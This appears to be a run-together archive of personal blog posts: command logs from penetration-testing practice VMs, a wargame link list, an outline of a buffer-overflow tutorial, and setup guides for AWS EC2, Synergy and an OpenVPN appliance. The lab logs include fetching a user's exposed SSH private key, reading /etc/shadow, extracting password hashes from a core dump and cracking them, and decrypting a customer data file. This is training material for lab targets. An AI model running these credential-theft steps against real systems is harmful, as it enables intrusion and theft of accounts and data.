Tools used:
Ubuntu
nmap
Metasploit Framework
Music:
Samba Do Brasil – Ey Macalena
Commands Used:
nmap -sP 192.168.246.0/24
nmap -sV 192.168.246.130
msfconsole
whoami
cat
Just a short list. Please let me know of ones I am missing:
http://www.overthewire.org/wargames/
https://cybersecuritychallenge.org.uk/index.php
http://www.pythonchallenge.com/
I'm taking a one-month break from Hacking-related posts to study up for the Microsoft 70-640: Configuring Windows Server 2008 Active Directory exam. While Hacking is fun, work pays the bills.
Tools used:
Backtrack 5
nmap
dirbuster
nikto
Music:
Hackers Soundtrack – Halcyon On and On
Commands Used:
nmap -sn 192.168.2.0/24
nmap -sV 192.168.2.100
nmap -sV 192.168.2.101
firefox 192.168.2.100 &
lynx -dump http://192.168.2.100/index2.html > dump
cat dump | sed 's/[^@]* \([a-zA-Z0-9.]*@[^ ]*\).*/\1/' > test
awk '{ printf "~"; print }' test > users
dirbuster
./nikto -host 192.168.2.101 -root ~pirrip/ -Display 1
firefox 192.168.2.101/~pirrip/.ssh &
wget http://192.168.2.101/~pirrip/.ssh/id_rsa
wget http://192.168.2.101/~pirrip/.ssh/id_rsa.pub
ssh pirrip@192.168.2.100
mailx
password is 0l1v3rTw1st
sudo more /etc/sudoers
sudo vi /etc/shadow
cp great_expectations.zip /var/www/htdocs
chmod 777 great_expectations.zip
tar xvwf great
strings
Tools used:
Backtrack 5
nmap
ftp
john the ripper
openssl
Music:
Marconi Union
Commands Used:
nmap -sP 192.168.1.0/24
nmap -sV 192.168.1.110
firefox 192.168.1.110 &
gedit names &
ftp 192.168.1.110
"login anonymous"
cd download/etc
get core
cat core
strings core > shadow
cd /pentest/password/john
./john --rules --wordlist=/pentest/password/wordlists/darc0de.lst /root/shadow
ssh bbanter@192.168.1.110
su
cd /root/.save
openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer.csv -pass file:/etc/ssl/certs/pw
In a multi-part blog post I will be taking a step-by-step approach to a Stack Based Buffer Overflow on a vulnerable application.
Part 1:
x86 Assembly Code Links
Video: Quick overview of Ollydbg, opening an exe, description of the frames & columns, Stepping, Assigning Breakpoints and triggering one.
What is fuzzing?
Part 2:
Using the spike fuzzer
Spike scripting, fuzzed protocol
Video: Fuzzing vulnerable application using Spike
Part 3:
Video: Show the vulnerability in action
Understanding Stack Overflows
Part 4:
Finding the offset
Finding a place for our code
Video: Redirecting execution to our code
Part 5:
Video: Adding shellcode to the exploit
Part 1:
This tutorial will be using a Windows XP VM. You will need 5 things for this walkthrough.
1. Some version of Windows. XP works best. If you use Vista or 7 you will have to adjust compatibility settings for the applications.
2. Vulnserver, the vulnerable application: Vulnserver
3. Ollydbg, 32-bit assembly debugger: Ollydbg 1.10
4. Perl, I recommend ActiveState Perl: ActiveState Perl
5. Download the breakpoint perl script: Breakpoint.pl
Ollydbg Intro Video:
Explanation of terms used in the video:
De-ICE 1.100 Level 1:
There are a million videos for De-ICE, but now there are a million and one. I wanted to make a video just to prove that I could and because no one would put this song to one of their videos. Just to make a point to g0tmi1k, I don't fix the broken ftp server at the end... and I never will!
First things first. When I say free I mean it's free for a year. You will have to use the micro-instance, which has a 10 GB HDD, 613 MB RAM and, I quote:
Up to 2 EC2 Compute Units (for short periodic bursts)
(Don't ask me the MHz on that...) It's plenty fast enough for terminal use, VNC for a basic desktop, programming, etc.
You will need a credit card and a cell phone. A visa gift card and a prepaid phone will work.
Let's sign up.
The signup process is pretty straightforward. They will call your cell phone and have you enter a PIN. If you get it wrong too many times you will be blocked from signing up for 24 hours. Once the signup process is complete, sign in and click the EC2 tab.
You may get pop-ups asking whether you want to stop a script; click no, the AWS console can be a bit slow to load.
Click ‘Launch Instance’
The instances with gold stars are the free micro tier instances and the ones you should pick unless you want to pay. You can also browse under 'Community AMIs' for other distributions. Let's pick the 'Basic 32 bit Amazon Linux AMI'. Click Select.
You can only have 1 instance at a time on the free setup, and it can only be a micro-instance. Click 'Continue'.
Place a check in 'Termination Protection'. Terminating an instance deletes the instance completely; the protection basically stops you from accidentally deleting it. On the next screen name your instance and click 'Continue'.
The 'Key Pair' is the only way you will be able to SSH into your instance at the start. You can change your sshd config later so you don't have to keep the key around. You cannot download this key again, so make sure you save it somewhere safe on this screen. Create a new key pair and select 'Continue'.
A 'security group' is essentially the firewall configuration. Choose the default one; it will already have the port open for SSH.
Your new instance is now running and you can connect to it. For SSH connection instructions, right click on your instance and select 'Connect'. Make sure to change the password when you connect for the first time.
Notes:
Let me know if you have any trouble or need extra help.
As a computer geek I found myself with a problem. I had multiple machines at my desk and only 2 solutions: either get a KVM with more than 2 ports or have a second/third set of keyboards and mice. The problem with the KVM was that I would only be able to see one computer screen at a time, and you can figure out the issues with the extra keyboards.
The three screens on the left are the laptop and 2 monitors connected to the laptop. The square monitor to the right is connected to another workstation under the desk that I use for VMs and testing. The problem was that every time I wanted to use that VM machine I had to pull out the extra keyboard and mouse.
That was until a work colleague introduced me to: http://synergy-foss.org/
This program allows you to use the same keyboard and mouse across workstations just by moving the mouse across your screen, as if the other machine were just an additional monitor.
In this example I will be using a Windows machine and an Ubuntu machine.
1. Download and install the client on both platforms.
2. The XP machine in this example will be the server (it has the keyboard and mouse attached).
3. Start Synergy -> Click 'Share this computer's keyboard....' and press the Configure button.
4. You will need to add a screen for the server and for the client machine.

5. The screen names need to be either the hostname of the machine or the IP. I use the hostname just in case the IP of the machine changes.
6. Next you need to set the links for each screen. This essentially says 'If I move my mouse off the right edge of the Server screen it moves onto the Client screen', which is the setup if you have the Server monitor on the left and the client monitor on the right.

7. That's it for the server XP machine. Go ahead and click 'Start' on the Synergy program.
8. Next we need to set up the Ubuntu client. I found that QuickSynergy is a great GUI frontend and the screenshots will reference it. Under the 'Ubuntu Software Center' search for 'Synergy' and install both options.

9. Open QuickSynergy and edit the ‘Use’ tab so that it contains the hostname/screen of the server and client.

10. Click ‘Execute’ and the Windows Synergy program should now show ‘UbuntuClient’ connected. Try moving the mouse across the screens and test typing.
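As an added example (not from the original post or the Synergy project), this is the text configuration the server side of steps 4 to 6 amounts to, assuming the screen names XPServer and UbuntuClient; substitute your own hostnames.

```text
# synergy.conf for the server (the XP machine that owns the keyboard and mouse).
# Assumed screen names: XPServer and UbuntuClient. Use your real hostnames,
# as the post recommends, so the config survives an IP change.
section: screens
    XPServer:
    UbuntuClient:
end

section: links
    # Server monitor on the left, client monitor on the right (step 6).
    XPServer:
        right = UbuntuClient
    # Links are one-directional: define the reverse link too,
    # or the mouse will cross to the client and never come back.
    UbuntuClient:
        left = XPServer
end
```

The client side needs no such file; QuickSynergy only has to be pointed at the server's screen name, as in step 9.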
I don’t know how I lived without this program before. Let me know if you have any questions.
If you have ever struggled with the command line version of OpenVPN and wished there was an easier way, well there is. The virtual appliance is a preinstalled VMware image with a built-in web interface to manage your OpenVPN connections. It comes with 2 connection licenses for free. The install is quick and you can have an OpenVPN connection up in 5 minutes.
1. Download the appropriate client for your environment. I will be using the VMware image.
2. The VMware image can be used in anything from Player up to Workstation. Workstation 8 on Ubuntu will be used in this demo.
3. Unzip the client: unzip OpenVPN-AS-Appliance-1.6.1.zip
4. Go to your VMWare product and open the vmx file.

5. Power on the virtual machine. When prompted during boot press 'Enter' and do not type in DELETE.
6. You will be presented with a blue screen:

7. If you need to setup a static IP go to configure network. The default is for it to be on DHCP.
8. Let's select 'Login' and set two passwords. The initial username is 'root' and the default password is 'openvpnas'.
9. Once logged in, go ahead and set a new root password by issuing the command 'passwd'. Next we need to set a password for the user 'openvpn' with the command 'passwd openvpn'. There isn't really anything more that needs to be done on this terminal. Go ahead and open a web browser on your local computer.
10. Go to the address https:// followed by the appliance's IP address. If you need to find your IP, log back into the terminal and type 'ifconfig eth0'. After you enter this into the browser you should get the screen below:

11. The login name will be ‘openvpn’ and the password is the one you set in the terminal for that user.
12. Next you will see the regular user options. We will come back to this. Go ahead and click ‘Admin’ and log back in using the openvpn user. Agree to the license.
13. There are only a couple more things to change before you are ready to connect. Under ‘Server Network Settings’ change the hostname either to your domain name or the public WAN ip people will be connecting to.
14. This is a personal preference, but under 'Authentication – General' I set it to 'Local'. This allows you to add new users on the web page without having to connect to the terminal. It's much easier to manage remotely this way.
15. That's it! You should now be able to connect to your OpenVPN server. Go to the web page https:// followed by the server address and log in. There is an automatically installed Windows client, or download the 'Yourself (user-locked profile)' to connect from Linux.
Notes: